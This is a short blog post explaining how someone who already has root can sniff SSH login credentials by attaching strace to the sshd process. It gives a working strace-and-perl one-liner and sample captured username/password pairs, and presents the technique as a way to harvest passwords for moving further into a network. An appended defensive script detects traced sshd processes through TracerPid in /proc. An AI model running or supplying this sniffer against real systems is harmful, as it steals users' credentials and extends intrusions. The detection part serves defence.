Sunday, 13 December 2009

SSHD password sniffing

I remember reading something a while back where someone had a Linux honeypot running a modified SSH daemon. This custom SSH daemon would log both the usernames and passwords of attempted connections. This is very interesting from a research point of view, as it gives you an idea as to what kind of password dictionaries are being used.

However, grabbing SSH passwords can also be useful if people tend to accidentally type the wrong password from time to time. You might have gained root on a particular box. By watching the SSH attempts it might be possible to gather additional valid passwords for other parts of the network - just because people accidentally type the wrong one in.

It isn't even necessary to install a new SSH daemon binary. If you already have root, you can just strace the process (assuming of course that strace is installed):


# strace -f -p $(pgrep -o sshd) 2>&1 | perl -ne 'BEGIN { $o=""; } { chomp; if ($_ =~ /getpeername/) { if ($o =~ /read\(\d+, \"\\[0-9a-z]\\[0-9a-f]\\[0-9a-f]\\[0-9a-f]\\[0-9a-f]([^\"]+)\"/) { $u = $1; print "$u, "; } } if ($_ =~ /getuid\(\)/) { if ($o =~ /read\(\d+, \"\\v\\[0-9a-f]\\[0-9a-f]\\[0-9a-f]\\[0-9a-f]([^\"]+)\"/) { $p = $1; print "$p\n"; }; } $o=$_;}'
cats, anddogs
root, r00t
admin, test
mysql, mysql


Now, the above script doesn't work for all variations of usernames/passwords. It needs some refining... but you get the general idea.
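From the defending side, an strace attached to sshd is visible in /proc: every traced process reports a non-zero TracerPid in its status file. The check below is an added example, not part of the original post; the function names and the sample PIDs are made up for illustration.

```shell
#!/bin/sh
# Added example (not from the original post): report sshd processes that have
# a ptrace tracer attached, which is what `strace -p` on sshd looks like.

# find_traced_sshd [PROC_ROOT] -> prints "sshd_pid tracer_pid tracer_name"
find_traced_sshd() {
    root="${1:-/proc}"
    for status in "$root"/[0-9]*/status; do
        [ -r "$status" ] || continue
        name=$(awk '$1 == "Name:" { print $2; exit }' "$status")
        case "$name" in
            sshd|sshd-*) ;;          # listener and per-connection helpers
            *) continue ;;
        esac
        # TracerPid is 0 when no process is ptrace-attached.
        tracer=$(awk '$1 == "TracerPid:" { print $2; exit }' "$status")
        case "$tracer" in
            ''|0) continue ;;
        esac
        tname=unknown
        if [ -r "$root/$tracer/status" ]; then
            tname=$(awk '$1 == "Name:" { print $2; exit }' "$root/$tracer/status")
        fi
        pid=${status%/status}
        echo "${pid##*/} $tracer $tname"
    done
}

# Constructed sample: a fake /proc tree so the check can be tried offline.
# PIDs and names below are made up for illustration.
make_sample_proc() {
    dir=$(mktemp -d)
    mkproc() {  # mkproc PID NAME TRACERPID
        mkdir -p "$dir/$1"
        printf 'Name:\t%s\nState:\tS (sleeping)\nTracerPid:\t%s\n' "$2" "$3" > "$dir/$1/status"
    }
    mkproc 801 sshd 4242      # listener, traced
    mkproc 913 sshd 4242      # forked child, traced via -f
    mkproc 950 sshd 0         # untraced session
    mkproc 4242 strace 0      # the tracer itself
    mkproc 1200 bash 0
    echo "$dir"
}

sample=$(make_sample_proc)
find_traced_sshd "$sample"    # on a live host: find_traced_sshd /proc
rm -rf "$sample"
```

On a production host sshd is not normally traced, so any line this prints from the real /proc is worth investigating.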
